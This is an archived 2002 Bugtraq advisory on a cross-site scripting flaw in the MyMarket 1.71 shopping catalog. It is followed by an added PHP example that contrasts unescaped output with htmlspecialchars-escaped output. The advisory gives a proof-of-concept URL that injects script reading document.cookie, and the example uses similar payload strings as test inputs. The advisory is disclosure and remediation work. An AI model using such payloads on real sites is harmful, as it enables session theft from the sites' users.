[27579] in bugtraq
XSS bug in MyMarket 1.71
daemon@ATHENA.MIT.EDU (qber66)
Wed Oct 23 17:12:41 2002
Message-ID: <01b701c259bf$75bf6ba0$397ba8c0@qber66>
From: "qber66" <qber66@pandora.be>
To: <bugtraq@securityfocus.com>
Date: Wed, 11 Sep 2002 20:17:15 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
+----------------------+
| XSS in MyMarket 1.71 |
+----------------------+
Product Description
===================
MyMarket is a fully functional online shopping catalog system, built using
PHP and MySQL. It was created by Ying Zhang for the purpose of teaching
people about the basics of creating an E-Commerce site. It can be found at
http://mymarket.sourceforge.net/
Vulnerable systems
==================
MyMarket 1.71
Exploit
=======
http://[target]/templates/form_header.php?noticemsg=<Scr*ipt>javascript:alert(document.cookie)</Scr*ipt>
(without "*")
Solution
========
Put these two lines at the beginning of form_header.php:
---- form_header.php -----
<?
// Escape HTML metacharacters before the template prints these values
$noticemsg = htmlspecialchars($noticemsg);
$errormsg = htmlspecialchars($errormsg);
...
--------------------------
Vendor response
===============
I submitted this a week ago; the vendor hasn't responded yet.
------------------------------
Tim Vandermeersch
qber66@pandora.be
http://users.pandora.be/tim/
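
The fix from the Solution section, shown as a before/after pair. This is an added PHP example, not code from MyMarket or from the advisory's author; the function names, the wrapper markup, the UTF-8 charset and the sample inputs are assumptions made for illustration.

```php
<?php
// Added illustration; render_notice_unsafe/render_notice_safe are hypothetical
// stand-ins for the part of form_header.php that prints $noticemsg.

// Before the fix: the request value goes into the page unchanged.
function render_notice_unsafe(array $query): string
{
    $noticemsg = $query['noticemsg'] ?? '';
    return '<p class="notice">' . $noticemsg . '</p>';
}

// After the fix: the value passes through htmlspecialchars() first.
// ENT_QUOTES also escapes ' and ", which matters if the value ever lands
// inside an HTML attribute (an assumption; the advisory does not say where
// the template prints it). The charset is likewise an assumption.
function render_notice_safe(array $query): string
{
    $noticemsg = htmlspecialchars(
        $query['noticemsg'] ?? '',
        ENT_QUOTES | ENT_SUBSTITUTE,
        'UTF-8'
    );
    return '<p class="notice">' . $noticemsg . '</p>';
}

// Constructed sample inputs (not taken from any real request).
$samples = [
    'plain text'      => 'Item added to cart',
    'markup'          => '<script>alert(document.cookie)</script>',
    'attribute break' => '" onmouseover="x',
];

foreach ($samples as $label => $value) {
    $query  = ['noticemsg' => $value];
    $unsafe = render_notice_unsafe($query);
    $safe   = render_notice_safe($query);

    // If input containing HTML metacharacters appears verbatim in the
    // output, the browser will parse it as markup instead of text.
    $hasMeta = strpbrk($value, '<>"\'&') !== false;
    printf(
        "%-16s unsafe reflects raw: %-3s | safe reflects raw: %s\n",
        $label,
        ($hasMeta && strpos($unsafe, $value) !== false) ? 'yes' : 'no',
        ($hasMeta && strpos($safe, $value) !== false) ? 'yes' : 'no'
    );
    echo "  safe output: {$safe}\n";
}
```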